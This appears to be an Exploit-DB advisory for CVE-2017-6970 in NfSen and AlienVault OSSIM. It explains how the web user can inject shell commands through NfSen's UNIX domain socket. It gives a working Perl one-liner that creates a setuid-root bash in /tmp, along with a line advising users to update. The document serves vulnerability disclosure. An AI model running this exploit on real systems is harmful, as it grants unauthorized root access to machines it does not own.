NfSen < 1.3.7 / AlienVault OSSIM < 5.3.6 - Privilege Escalation

EDB-ID: 42305
Author: Paul Taylor
Published: 2017-07-10
CVE: CVE-2017-6970
Type: Local
Platform: Linux
Vulnerable App: Download Vulnerable Application

 # Version: NfSen 1.3.7 
# Version: AlienVault 5.3.6
# Date: 2017-07-10
# Vendor Homepage:
# Vendor Homepage:
# Software Link:
# Exploit Author: Paul Taylor / Foregenix Ltd
# Website:
# Tested on: AlienVault USM 5.3.6
# CVE: CVE-2017-6970

1. Description

The web user (in AlienVault USB www-data) has access to the NfSen IPC UNIX domain socket. This can be used to send a crafted command (complete with shell metacharacter injection) to the NfSen Perl components, causing OS command injection in a root privilege context, and therefore can be leverage for privilege escalation from the web user to full root privileges.

2. Proof of Concept

Pre-requisites - web user/www-data shell (e.g. web shell, or reverse shell).

Execute the following command:

perl -e 'use Socket; socket(my $nfsend, AF_UNIX, SOCK_STREAM, 0); connect($nfsend, sockaddr_un("/var/nfsen/run/nfsen.comm")); print $nfsend "run-nfdump\nargs=-h \$(bash -c \"cp /bin/bash /tmp\")\n.\nrun-nfdump\nargs=-h \$(bash -c \"chmod u+s /tmp/bash\")\n.\n";'

This will create a set uid root bash binary in /tmp, which can then be used to gain full root privileges.

3. Solution:

Update to latest version of NfSen/USM/OSSIM

Related Posts